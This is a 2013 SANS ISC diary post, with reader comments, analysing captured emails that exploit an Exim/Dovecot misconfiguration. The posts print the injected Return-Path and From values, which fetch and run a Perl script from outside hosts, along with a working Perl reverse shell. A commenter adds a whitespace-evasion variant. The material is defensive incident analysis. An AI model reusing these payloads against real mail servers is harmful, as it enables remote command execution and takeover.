Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Dovecot / Exim Exploit Detects SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network
https://isc.sans.edu/honeypot.html

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Dovecot / Exim Exploit Detects

Sometimes it doesn't take an IDS to detect an attack, but just reading your e-mail will do. Our read Timo sent along these two e-mails he received, showing exploitation of a recent Dovecot/Exim configuration flaw [1]:

Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/exim``perl${IFS}/tmp/p.pl`@blaat.com>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local (disco.dnttm.ro [193.226.98.239])
       by [REMOVED]


Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/php.jpg``perl${IFS}/tmp/p.pl`@blaat.com>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local (disco.dnttm.ro [193.226.98.239])
       by [REMOVED]

The actual exploit happens in the "Return-Path" line. If exim is used as a mail server, it can be configured to "pipe" messages to an external program in order to allow for more advanced delivery and filtering options. A common configuration includes the mail devliery agent Dovecot which implements a pop3 and imap server. Sadly, the sample configuration provided to configure Dovecot with Exim passes the string the attacker provided as "MAIL FROM" in the e-mail envelope as a shell parameter without additional validation.

The first script ("exim") is a little one liner shell connecting to port 9 on vps.usits.net (reformated for redability)

use Socket;
$i="vps.usits.net";
$p=9;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))) {
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");};

The second script  first retrieves a perl script, and then executes it. The perl script does implement a simple IRC client connecting to mix.cf.gs on port 3303 (right now, this resolves to 140.117.32.135, but is not responding on port 3303)

For more details, see the writeout by RedTeam Pentesting [2]

[1] http://osvdb.org/show/osvdb/93004
[2] https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

I will be teaching next: Defending Web Applications Security Essentials - SANS San Francisco Spring 2020

 Johannes

3693 Posts
ISC Handler
Subscribe Jul 29th 2013
6 years ago
Quick addition: the {IFS} string replaces the white space. iFS is the Unix environment variable for the separator.
 Johannes

3693 Posts
ISC Handler
Quote Jul 29th 2013
6 years ago
Hi Guys,

shortly after Heise report this (http://www.heise.de/newsticker/meldung/Angriffe-auf-Mail-Server-Exim-Dovecot-1925552.html) the Server behind
x.cc.st (81.169.134.139) got shutting down by the Hoster (Strato).

Mon, 29 Jul 2013 17:57:01 +0200 (CEST) i got a new mail ...
Received: from domain.local (unknown [85.214.65.216])
by [REMOVED]
for <postmaster@localhost>; Mon, 29 Jul 2013 17:56:35 +0200 (CEST)
Date: Mon, 29 Jul 2013 17:57:01 +0200 (CEST)
From: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}85.214.65.216/p.pl``perl${IFS}/tmp/p.pl`@blaat.com
To: undisclosed-recipients:;
 Johannes
1 Posts
Quote Jul 29th 2013
6 years ago
The use of IFS is weird. The default value of IFS is the string containing: a space followed by a tab and then a newline.
Would have expected something more like

wget$'\040'http://blahblahblah.example.com
 Mysid

146 Posts
Quote Jul 29th 2013
6 years ago

Sign Up for Free or Log In to start participating in the conversation!